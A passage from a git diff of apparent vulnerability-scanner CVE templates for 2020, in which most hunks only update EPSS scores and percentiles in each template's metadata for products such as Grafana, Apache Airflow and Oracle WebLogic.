metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 1d1709dbdc..317cb52b4a 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11110 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.73942 + epss-percentile: 0.74072 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index e0b027ed62..968b3bad18 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - epss-score: 0.58469 - epss-percentile: 0.97408 + epss-score: 0.59818 + epss-percentile: 0.9747 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index 30cd46d109..30c9923a91 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11455 cwe-id: CWE-22 - epss-score: 0.76858 - epss-percentile: 0.97904 + epss-score: 0.84551 + epss-percentile: 0.98222 cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 3375043293..4647555be2 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11529 cwe-id: CWE-601 epss-score: 0.00349 - epss-percentile: 0.68673 + epss-percentile: 0.68824 cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 5b9a607735..4486e0eccc 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11530 cwe-id: CWE-89 - epss-score: 0.78893 - epss-percentile: 0.97962 + epss-score: 0.82449 + epss-percentile: 0.98132 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 10f6f03ef8..d1e5959dad 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-11546 cwe-id: CWE-94 epss-score: 0.96524 - epss-percentile: 0.99494 + epss-percentile: 0.99507 cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 71e21c7f7a..e280d75ee6 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - epss-percentile: 0.43768 + epss-percentile: 0.43845 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 42736d8204..9832168774 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11710 - epss-score: 0.02084 - epss-percentile: 0.8785 + epss-score: 0.02925 + epss-percentile: 0.89782 cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index bf793cd350..f46625ba6b 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -23,8 +23,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11738 cwe-id: CWE-22 - epss-score: 0.9743 - epss-percentile: 0.9993 + epss-score: 0.97366 + epss-percentile: 0.99888 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index ea3b44b2ef..c6d5026b30 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-11798 cwe-id: CWE-22 - epss-score: 0.82989 - epss-percentile: 0.98118 + epss-score: 0.82302 + epss-percentile: 0.98125 cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 12960bb425..2c306c2d9f 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -21,7 +21,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11853 epss-score: 0.82121 - epss-percentile: 0.98087 + epss-percentile: 0.98108 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 90d99fc8a0..d2a8c6c09a 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-11854 cwe-id: CWE-798 epss-score: 0.2548 - epss-percentile: 0.96228 + epss-percentile: 0.96257 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 9e02c7ae18..2a129fe2f9 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00396 - epss-percentile: 0.70553 + epss-percentile: 0.70723 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index d52bb3ec5b..d9a2280d13 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11978 cwe-id: CWE-78 epss-score: 0.97156 - epss-percentile: 0.99756 + epss-percentile: 0.99761 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 8d3792e8ac..db225c3aac 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11991 cwe-id: CWE-611 - epss-score: 0.80133 - epss-percentile: 0.98003 + epss-score: 0.81153 + epss-percentile: 0.98059 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 73a55cf927..438b6682cb 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47354 + epss-percentile: 0.47461 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index bba5aa18d1..a6d15079bb 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-12116 cwe-id: CWE-22 epss-score: 0.97317 - epss-percentile: 0.99856 + epss-percentile: 0.99861 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 25b7a7cb8c..8d05313366 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -15,14 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12124 cwe-id: CWE-78 - epss-score: 0.00269 - epss-percentile: 0.64297 + epss-score: 0.9601 + epss-percentile: 0.99351 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: wavlink product: wn530h4_firmware tags: cve,cve2020,rce,wavlink - variables: str: "{{rand_base(3)}}" num: "{{rand_int(1, 10)}}" diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 09496c70e8..f93c16d1e0 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.03321 - epss-percentile: 0.90305 + epss-score: 0.0449 + epss-percentile: 0.91611 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 6fefe7a46f..9f86cfa916 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-12256 cwe-id: CWE-79 epss-score: 0.17512 - epss-percentile: 0.95605 + epss-percentile: 0.95653 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 4221612421..36644d232f 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-12259 cwe-id: CWE-79 epss-score: 0.16256 - epss-percentile: 0.95461 + epss-percentile: 0.95479 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index ba23fd5e3f..2eaed5a13c 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12447 cwe-id: CWE-22 - epss-score: 0.01778 - epss-percentile: 0.86637 + epss-score: 0.01711 + epss-percentile: 0.86438 cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 37c9427179..ef85ce3761 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-12478 cwe-id: CWE-306 epss-score: 0.01186 - epss-percentile: 0.8345 + epss-percentile: 0.83549 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 9133593ec2..a61a867ec7 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.8945 - epss-percentile: 0.98471 + epss-score: 0.90609 + epss-percentile: 0.98582 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 3145f2f7eb..21cd7caadf 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.05816 - epss-percentile: 0.92583 + epss-score: 0.06438 + epss-percentile: 0.92985 cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index c81f56059b..66790108f5 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - epss-percentile: 0.61472 + epss-percentile: 0.61642 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index e4b5f25401..40f63229ad 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13158 cwe-id: CWE-22 epss-score: 0.01736 - epss-percentile: 0.86495 + epss-percentile: 0.86549 cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 1c1db3662f..27e53e04bc 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 - epss-score: 0.97419 - epss-percentile: 0.99919 + epss-score: 0.97405 + epss-percentile: 0.99917 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 8295d9e656..191273ca33 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.7267 + epss-percentile: 0.72797 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 6004334d7c..23fbd3a342 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13379 cwe-id: CWE-918 epss-score: 0.76934 - epss-percentile: 0.97907 + epss-percentile: 0.97928 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index b0f0e813b0..1b7c43475a 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 - epss-score: 0.00812 - epss-percentile: 0.79787 + epss-score: 0.01002 + epss-percentile: 0.81964 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 12c4740758..5858365767 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44511 + epss-percentile: 0.44613 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 41cf5359b0..9217ac3463 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.324 - epss-percentile: 0.96581 + epss-score: 0.36738 + epss-percentile: 0.96806 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 852fe83e0e..95d761c914 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01831 - epss-percentile: 0.86869 + epss-percentile: 0.86908 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 7b4e9f4a4e..47500c35ac 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65447 + epss-percentile: 0.65609 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 4db56f0826..3e53fa7b18 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -15,8 +15,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-13851 cwe-id: CWE-78 - epss-score: 0.96827 - epss-percentile: 0.99609 + epss-score: 0.96959 + epss-percentile: 0.99672 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 2443529dfc..3cdf3c46ea 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13927 cwe-id: CWE-1188 epss-score: 0.96763 - epss-percentile: 0.9959 + epss-percentile: 0.99598 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 801aa8303e..5e144df29c 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13937 cwe-id: CWE-922 epss-score: 0.97368 - epss-percentile: 0.99885 + epss-percentile: 0.99888 cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 6130152e37..3aebb4b91d 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -22,9 +22,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13942 - cwe-id: CWE-20,CWE-74 + cwe-id: CWE-74,CWE-20 epss-score: 0.97256 - epss-percentile: 0.99814 + epss-percentile: 0.99818 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 5abb02b0f0..7d87e02b02 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 - epss-score: 0.00558 - epss-percentile: 0.75054 + epss-score: 0.00587 + epss-percentile: 0.7581 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index dc06773b20..9ef8ba9829 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14092 cwe-id: CWE-89 epss-score: 0.66877 - epss-percentile: 0.97623 + epss-percentile: 0.97643 cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index b1abae80ea..a3c567bff8 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14144 cwe-id: CWE-78 epss-score: 0.97181 - epss-percentile: 0.99769 + epss-percentile: 0.99775 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 4e605dbe73..08c81a1ed1 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.0071 - epss-percentile: 0.78218 + epss-score: 0.00927 + epss-percentile: 0.81211 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index bd4c9a5f60..154d7edef7 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.96647 - epss-percentile: 0.99541 + epss-score: 0.96363 + epss-percentile: 0.99452 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 776d81bf97..4b111f978e 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44511 + epss-percentile: 0.44613 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index ae4c18289e..197ec75748 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.39589 + epss-percentile: 0.39654 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 0468048928..1a8d02bc34 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - epss-score: 0.97553 - epss-percentile: 0.99995 + epss-score: 0.97544 + epss-percentile: 0.99996 cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 48b49387d1..634fefb3fc 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-14864 cwe-id: CWE-22 - epss-score: 0.29225 - epss-percentile: 0.96431 + epss-score: 0.21848 + epss-percentile: 0.96018 cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 4f45e92bf0..64cc6d38af 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - epss-score: 0.97402 - epss-percentile: 0.99908 + epss-score: 0.9739 + epss-percentile: 0.99906 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 26537f6002..30ccfeddd4 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14883 epss-score: 0.97297 - epss-percentile: 0.99846 + epss-percentile: 0.9985 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index be39f5d2a4..49373133ea 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 - epss-score: 0.31003 - epss-percentile: 0.96517 + epss-score: 0.4691 + epss-percentile: 0.97123 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 409c83e1c7..5667859a2d 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15129 cwe-id: CWE-601 epss-score: 0.00701 - epss-percentile: 0.78028 + epss-percentile: 0.7816 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 378f14c48b..85221174df 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-15148 cwe-id: CWE-502 epss-score: 0.0208 - epss-percentile: 0.87841 + epss-percentile: 0.87879 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index bb69ab6732..a0f6ac36f4 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 epss-score: 0.97307 - epss-percentile: 0.99851 + epss-percentile: 0.99855 cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 500b13ebc4..445882f87c 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -19,7 +19,7 @@ info: cve-id: 